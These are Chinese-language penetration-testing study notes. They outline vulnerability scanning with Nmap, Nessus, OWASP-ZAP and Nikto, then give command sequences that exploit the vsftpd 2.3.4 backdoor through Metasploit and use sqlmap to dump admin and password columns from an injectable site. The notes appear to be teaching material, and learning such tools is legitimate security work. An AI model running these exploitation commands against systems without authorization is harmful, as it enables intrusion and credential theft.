系统漏洞扫描
- 漏洞扫描原理
- 漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但也存在错误扫描,需要对扫描结果进行漏洞验证
- 扫描器原理大致相同,都是通过发送对应的验证数据到目标具体服务进行验证。到收到响应与存在漏洞的响应一致时,就表明存在漏洞
- 漏洞扫描工具-Nmap
- nmap --script vuln 目标IP地址
- 漏洞扫描工具-nessus
- 漏洞利用metasploit
- 利用Metasploit对扫描到的漏洞加以利用 以vsftpd2.3.4为例
- Kali 进入metasploit
- msfconsole(建议msfdb run)
- 查找漏洞
- search vsftpd
- 使用漏洞
- use exploit/unix/ftp/vsftpd 234 backdoor
- 查看需要设置的参数
- show options
- 查看可利用的攻击模块
- show payloads
- set 攻击模块名–设置攻击模块
- set rhosts IP地址(攻击目标的IP)
- 攻击
- exploit/run
- 查看需要设置的参数
- use exploit/unix/ftp/vsftpd 234 backdoor
Web程序漏洞扫描
-
针对Web应用程序的漏洞扫描其实就是每个扫描器读取自己的Payload进行探测
- Web漏洞扫描器
- Owasp-zap
- AWVS
- Appscan
- Nikto
- Burpsuite
- 每个扫描器都有各自不同的Payload进行探测
- Web漏洞扫描器
-
OWASP-ZAP漏洞扫描
- OWASP-ZAP是OWASP组织开发的用于Web应用程序漏洞扫描器。免费开源,不断更新维护
-
nikto漏洞扫描
- 对目标服务器进行漏洞扫描。主要针对HTTP服务器
- nilto --host IP地址
- 对目标服务器进行漏洞扫描。主要针对HTTP服务器
-
漏洞利用
- 使用sqlmap对扫描到的Sql注入漏洞进行利用
- sqlmap -u “漏洞的URL”
- sqlmap -u “漏洞URL” --tables (爆表,假设爆出的表名admin)
- sqlmap -u “漏洞URL” -T admin --columns (爆admin表的列名,假设admin,password)
- sqlmap -u “漏洞URL” -T admin -C “admin, password” --dump (获取对应的数据)